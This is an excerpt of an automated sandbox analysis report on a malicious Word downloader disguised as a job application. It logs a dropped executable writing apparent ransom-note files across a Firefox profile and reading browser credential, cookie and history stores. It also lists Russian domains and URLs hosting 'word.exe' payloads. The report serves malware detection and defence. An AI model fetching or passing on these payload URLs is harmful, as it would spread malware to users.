Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\blocklist.xml	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\blocklist.xml	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\content-prefs.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\content-prefs.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\events\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239617617.0675a2f8-c025-4cb1-98bc-4a943648cf69.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239617617.0675a2f8-c025-4cb1-98bc-4a943648cf69.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239777499.026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239777499.026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\WINNT_x86-msvc\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.voucher	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.voucher	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\mimeTypes.rdf	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\mimeTypes.rdf	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\0675a2f8-c025-4cb1-98bc-4a943648cf69	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\0675a2f8-c025-4cb1-98bc-4a943648cf69	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\804b5b8e-3057-4315-ada7-6389f240c010	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\804b5b8e-3057-4315-ada7-6389f240c010	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search-metadata.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search-metadata.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\PSVULHG-MANUAL.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20150305021524	Jump to behavior
Source: C:\Windows\Temp\229.exe	File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20150305021524	Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\session-state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionCheckpoints.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\0675a2f8-c025-4cb1-98bc-4a943648cf69	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.voucher	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20151216175450	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\webapps.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webappsstore.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\times.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\mimeTypes.rdf	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\.metadata	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\blocklist.xml	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239777499.026c3ebc-c6e0-47be-bdb8-30f2cf4bf8d6.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\content-prefs.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239617617.0675a2f8-c025-4cb1-98bc-4a943648cf69.main.jsonlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\permissions.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search-metadata.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\xulstore.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\804b5b8e-3057-4315-ada7-6389f240c010	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\search.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\upgrade.js-20150305021524	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\pluginreg.dat	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\state.json	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\gmpopenh264.info	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\places.sqlite	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\.metadata	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4	Jump to behavior

Searches for user specific document files

Show sources

Source: C:\Windows\Temp\229.exe	Directory queried: C:\Users\Default\Documents			Jump to behavior
Source: C:\Windows\Temp\229.exe	Directory queried: C:\Users\Default\Documents			Jump to behavior

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
14:00:48	API Interceptor	674x Sleep call for process: WINWORD.EXE modified
14:01:04	API Interceptor	4x Sleep call for process: powershell.exe modified
14:01:11	API Interceptor	1x Sleep call for process: 229.exe modified

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Sarah_Siedler_Bewerbungsunterlagen.doc	47%	virustotal		Browse
Sarah_Siedler_Bewerbungsunterlagen.doc	100%	Avira	W97M/Dldr.Sload.dqyyh

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
sndtgo.ru	2%	virustotal	Browse
jewemsk.ru	0%	virustotal	Browse
starstyl.ru	3%	virustotal	Browse
prostor-rybalka.ru	4%	virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe	100%	Avira URL Cloud	malware
https://starstyl.ru/assets/plugiH	0%	Avira URL Cloud	safe
https://starstyl.ruDj	0%	Avira URL Cloud	safe
https://www.kakaocorp.link/static/imgs/hehe.png	0%	Avira URL Cloud	safe
http://prostor-rybalka.ruh%	0%	Avira URL Cloud	safe
https://www.kakaocorp.link/static/imgs/hehe.png6	0%	Avira URL Cloud	safe
https://jewemsk.ru	0%	Avira URL Cloud	safe
https://jewemsk.ruh%	0%	Avira URL Cloud	safe
https://starstyl.ru	0%	Avira URL Cloud	safe
http://prostor-rybalka.ruH	0%	Avira URL Cloud	safe
http://sndtgo.ru/word.exe	100%	Avira URL Cloud	malware
http://sndtgo.ruH	0%	Avira URL Cloud	safe
http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe	0%	Avira URL Cloud	safe
https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidH	0%	Avira URL Cloud	safe
http://sndtgo.ru/word.exeH	0%	Avira URL Cloud	safe
http://sndtgo.ruh%	0%	Avira URL Cloud	safe
https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exeH	0%	Avira URL Cloud	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.kakaocorp.link	5Love_You_2019_26286368-txt.js	Get hash	malicious	Browse	138.201.162.99
	30Love_You_2019_42213448-txt.js	Get hash	malicious	Browse	138.201.162.99
	PIC037682552-JPG.js	Get hash	malicious	Browse	185.52.2.154
	temp.js	Get hash	malicious	Browse	107.173.49.208
	9Love_You_2019_25631240-txt.js	Get hash	malicious	Browse	138.201.162.99
	19Love_You_2019_5148480-txt.js	Get hash	malicious	Browse	138.201.162.99
	70Love_You_2019_35776208-txt.js	Get hash	malicious	Browse	138.201.162.99
	13Love_You_2019_26946376-txt.js	Get hash	malicious	Browse	138.201.162.99
	29PIC089361442019-jpg.js	Get hash	malicious	Browse	138.201.162.99
	1f03f2b9.zip	Get hash	malicious	Browse	185.52.2.154
	11Love_You_2019_3823528-txt.js	Get hash	malicious	Browse	138.201.162.99
	PIC08936072-JPG.js	Get hash	malicious	Browse	185.52.2.154
	3Love_You_2019_4173048-txt.js	Get hash	malicious	Browse	138.201.162.99
	3Love_You_2019_37500792-txt.js	Get hash	malicious	Browse	138.201.162.99
	39Love_You_2019_37682632-txt.js	Get hash	malicious	Browse	138.201.162.99
	39PIC0365355682019-jpg.js	Get hash	malicious	Browse	138.201.162.99
	Tim_Krieger_Bewerbungsunterlagen.doc	Get hash	malicious	Browse	46.30.41.117
	PIC08936072-JPG.js	Get hash	malicious	Browse	185.52.2.154
	PIC08936072-JPG.js	Get hash	malicious	Browse	185.52.2.154
	PIC01932424-JPG.js	Get hash	malicious	Browse	185.52.2.154
a767.dscg3.akamai.net	13Fil.exe	Get hash	malicious	Browse	2.18.212.26
	42INVOICE.exe	Get hash	malicious	Browse	23.10.249.50
	https://directgloagns.com/main	Get hash	malicious	Browse	23.10.249.17
	33CHANGE OF BANK DETAILS.exe	Get hash	malicious	Browse	23.10.249.50
	Report From Fax.htm	Get hash	malicious	Browse	23.10.249.50
	67Payment_Advice.exe	Get hash	malicious	Browse	23.10.249.50
	61Quotation 112718.exe	Get hash	malicious	Browse	23.10.249.17
	7Update-KB3984-x86.exe	Get hash	malicious	Browse	23.10.249.17
	3Update-KB4750-x86.exe	Get hash	malicious	Browse	23.10.249.17
	1Update-KB2375-x86.exe	Get hash	malicious	Browse	23.10.249.50
	1Update-KB7546-x86.exe	Get hash	malicious	Browse	23.10.249.50
	025.doc	Get hash	malicious	Browse	23.10.249.50
	5Love_You_2018_3091048.js	Get hash	malicious	Browse	23.10.249.17
	18Love_You_2018_38337808.js	Get hash	malicious	Browse	23.10.249.17
	11Love_You_2018_26476512.js	Get hash	malicious	Browse	2.18.212.48
	9Update-KB4265-x86.exe	Get hash	malicious	Browse	23.10.249.17
	12Update-KB7562-x86.exe	Get hash	malicious	Browse	80.239.152.138
	17file.dat.exe	Get hash	malicious	Browse	23.10.249.17
	31Update-KB8312-x86.exe	Get hash	malicious	Browse	23.10.249.17
